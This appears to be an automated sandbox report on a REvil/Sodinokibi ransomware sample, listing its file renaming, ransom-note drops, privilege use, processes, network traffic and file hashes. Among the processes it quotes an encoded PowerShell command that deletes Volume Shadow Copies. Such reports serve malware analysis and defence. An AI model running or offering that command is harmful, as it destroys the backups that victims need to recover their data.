Analysis Overview
SHA256
740ad8ea62f10de39e0b794cf6f579f25af1b8d79f859b48ecd41edc1f92cf13
Threat Level: Known bad
The file Revil.bin.zip was found to be: Known bad.
Malicious Activity Summary
Sodin,Sodinokibi,REvil
Modifies extensions of user files
Enumerates connected drives
Sets desktop wallpaper using registry
Drops file in Program Files directory
Unsigned PE
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Suspicious use of SendNotifyMessage
Suspicious behavior: LoadsDriver
Suspicious use of AdjustPrivilegeToken
Checks processor information in registry
Modifies registry class
Uses Volume Shadow Copy service COM API
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-06-02 12:26
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-06-02 12:26
Reported
2023-06-02 12:28
Platform
win10v2004-20230220-en
Max time kernel
120s
Max time network
128s
Command Line
Signatures
Sodin,Sodinokibi,REvil
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File renamed | C:\Users\Admin\Pictures\GroupEnter.tif => \??\c:\users\admin\pictures\GroupEnter.tif.emd4l3g7 | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\UnblockSearch.crw => \??\c:\users\admin\pictures\UnblockSearch.crw.emd4l3g7 | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\CopyRestart.crw => \??\c:\users\admin\pictures\CopyRestart.crw.emd4l3g7 | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\EnterReceive.crw => \??\c:\users\admin\pictures\EnterReceive.crw.emd4l3g7 | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
Enumerates connected drives
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\du8nxx.bmp" | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\program files\ShowRegister.html | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
| File opened for modification | \??\c:\program files\UnregisterUnlock.DVR-MS | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
| File created | \??\c:\program files\EDGEWATER-README.txt | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
| File opened for modification | \??\c:\program files\ClearGrant.css | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
| File opened for modification | \??\c:\program files\EnableAssert.jpg | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
| File opened for modification | \??\c:\program files\ReceiveDisable.pdf | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
| File opened for modification | \??\c:\program files\StopComplete.kix | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
| File opened for modification | \??\c:\program files\UnblockMerge.tiff | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
| File opened for modification | \??\c:\program files\UndoRead.3gp | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
| File created | \??\c:\program files (x86)\EDGEWATER-README.txt | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
| File opened for modification | \??\c:\program files\DisableExpand.iso | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
| File opened for modification | \??\c:\program files\ProtectRedo.xhtml | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
| File opened for modification | \??\c:\program files\StopAdd.ex_ | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\Revil.exe
"C:\Users\Admin\AppData\Local\Temp\Revil.exe"
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\EDGEWATER-README.txt
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="952.0.805638234\1241528181" -parentBuildID 20221007134813 -prefsHandle 1836 -prefMapHandle 1828 -prefsLen 20890 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c14800ac-6726-41f7-bcd1-b0887e76a93b} 952 "\\.\pipe\gecko-crash-server-pipe.952" 1916 1e927b18f58 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="952.1.868077025\1981275436" -parentBuildID 20221007134813 -prefsHandle 2308 -prefMapHandle 2304 -prefsLen 20926 -prefMapSize 232675 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {364ffcb7-1af0-411d-9701-22060a7ca56b} 952 "\\.\pipe\gecko-crash-server-pipe.952" 2320 1e919b72258 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="952.2.702027262\807800161" -childID 1 -isForBrowser -prefsHandle 2896 -prefMapHandle 3016 -prefsLen 21074 -prefMapSize 232675 -jsInitHandle 1472 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8b9345fe-ee2a-478a-ac1f-0a9192c454e1} 952 "\\.\pipe\gecko-crash-server-pipe.952" 2852 1e926a93a58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="952.3.106384205\583095537" -childID 2 -isForBrowser -prefsHandle 3444 -prefMapHandle 3452 -prefsLen 26519 -prefMapSize 232675 -jsInitHandle 1472 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {691a5033-d98e-46a1-9dce-15c83788c12e} 952 "\\.\pipe\gecko-crash-server-pipe.952" 1448 1e919b64d58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="952.4.547139582\1724242994" -childID 3 -isForBrowser -prefsHandle 4040 -prefMapHandle 4044 -prefsLen 26519 -prefMapSize 232675 -jsInitHandle 1472 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d7982a46-a068-4078-8288-785cc7ffe84a} 952 "\\.\pipe\gecko-crash-server-pipe.952" 4032 1e919b62b58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="952.5.895855528\1841134398" -childID 4 -isForBrowser -prefsHandle 4824 -prefMapHandle 2796 -prefsLen 26578 -prefMapSize 232675 -jsInitHandle 1472 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {28884098-b2ec-4bbd-91a7-0a5456b71169} 952 "\\.\pipe\gecko-crash-server-pipe.952" 4820 1e92ce13058 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="952.7.1484719223\1037916001" -childID 6 -isForBrowser -prefsHandle 5212 -prefMapHandle 5216 -prefsLen 26578 -prefMapSize 232675 -jsInitHandle 1472 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {40fa9b26-a625-4ab5-9aad-e3bd229d12d9} 952 "\\.\pipe\gecko-crash-server-pipe.952" 5204 1e92ce14858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="952.6.1365605456\383882499" -childID 5 -isForBrowser -prefsHandle 5012 -prefMapHandle 5016 -prefsLen 26578 -prefMapSize 232675 -jsInitHandle 1472 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {19d5797c-47f0-49a5-8d93-b3219ba55f30} 952 "\\.\pipe\gecko-crash-server-pipe.952" 5092 1e92ce11b58 tab
Network
| Country | Destination | Domain | Proto |
| IE | 20.190.159.0:443 | tcp | |
| US | 8.247.210.254:80 | tcp | |
| US | 52.168.117.169:443 | tcp | |
| IE | 20.190.159.71:443 | tcp | |
| US | 93.184.220.29:80 | tcp | |
| IE | 20.190.159.68:443 | tcp | |
| US | 8.247.210.254:80 | tcp | |
| NL | 173.223.113.164:443 | tcp | |
| NL | 173.223.113.131:80 | tcp | |
| US | 204.79.197.203:80 | tcp | |
| IE | 40.126.31.71:443 | tcp | |
| N/A | 127.0.0.1:50150 | tcp | |
| N/A | 127.0.0.1:50157 | tcp | |
| IE | 40.126.31.73:443 | tcp | |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | getpocket.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | firefox.settings.services.mozilla.com | udp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 8.8.8.8:53 | shavar.services.mozilla.com | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | getpocket.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | firefox.settings.services.mozilla.com | udp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
Files
memory/2160-133-0x0000000000F60000-0x0000000000F80000-memory.dmp
memory/2160-134-0x0000000000F60000-0x0000000000F80000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bfwqgh4n.eia.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/820-135-0x00000191A54E0000-0x00000191A5502000-memory.dmp
memory/820-145-0x00000191A5530000-0x00000191A5540000-memory.dmp
memory/820-146-0x00000191A5530000-0x00000191A5540000-memory.dmp
memory/820-147-0x00000191A5530000-0x00000191A5540000-memory.dmp
memory/2160-150-0x0000000000F60000-0x0000000000F80000-memory.dmp
C:\Recovery\EDGEWATER-README.txt
| MD5 | 0653bba8d16055266ce80549fedcd50b |
| SHA1 | 04d3bdbf195b183f5339228039012a71fbc2ed40 |
| SHA256 | 55c9b611135f23c90321dc3a9dfedddd9fe80d076372e1926e0584bf50ca502f |
| SHA512 | 89c63b5fbbfd6aced0b7d349d9e45e85fb14493d1ed3b3195e6abc0cf2bfd5ad926088b757b51f1191938677b1795ff85ca6a5d8fa6c6d7f039ddb74008944ef |
memory/2160-239-0x0000000000F60000-0x0000000000F80000-memory.dmp
C:\Users\Public\Desktop\EDGEWATER-README.txt
| MD5 | 0653bba8d16055266ce80549fedcd50b |
| SHA1 | 04d3bdbf195b183f5339228039012a71fbc2ed40 |
| SHA256 | 55c9b611135f23c90321dc3a9dfedddd9fe80d076372e1926e0584bf50ca502f |
| SHA512 | 89c63b5fbbfd6aced0b7d349d9e45e85fb14493d1ed3b3195e6abc0cf2bfd5ad926088b757b51f1191938677b1795ff85ca6a5d8fa6c6d7f039ddb74008944ef |
memory/2160-544-0x0000000000F60000-0x0000000000F80000-memory.dmp
memory/2160-553-0x0000000000F60000-0x0000000000F80000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6exu9k4v.default-release\prefs.js
| MD5 | 108b97b1ff7efbdb1aecce96d55ff2e5 |
| SHA1 | bb72b2e0c3d859fe5e821632307a32df331b55e1 |
| SHA256 | c5e19d4313b524fffc4859f4fac05ea3dcf408714a736dbd0bb7fcdf5131f80e |
| SHA512 | e0f7678424e68957a1cb521786e9e4e54c179f9a263b04d0c6a96147cb1e242b58bda3e74e6f142dcd9b6dd313a0061c3050af334b149eab9a8040f923da84dc |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6exu9k4v.default-release\prefs-1.js
| MD5 | 6ac81b523ba498a27b4e0ff11b481dfb |
| SHA1 | bc9609f16f45c7306543cc1bd9ec1090681f8ade |
| SHA256 | 7a5f22cc2d2b1db9e27d23d45fcd6fddee6bc204138bcd4f898f4e1b29d00fb9 |
| SHA512 | 3003ff812b3bce32942949c484f9ef33326e677938b2127d66e0729750b397a17408c2816f6caebecba916eda5a21d82d6def22e656c0b7f3dcde662763403dc |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6exu9k4v.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 7f2b8f49b607474270b2232171284aa4 |
| SHA1 | 69ede61485dd20dad59f21abf1b85b6591ea99bc |
| SHA256 | 8fb8efb01e49a89b3fc95a0d8c92eba55a6f5e68da7e9da89effe5d7c7e228a4 |
| SHA512 | 11b01c9fa33706caae15b87874d97b39282eb304ee698d6af72207ee0c11abfcbdfa6c5bd85740ffe6b9545d3d0539afa7f9b8da6c2e03e5bacc50d2ed3db829 |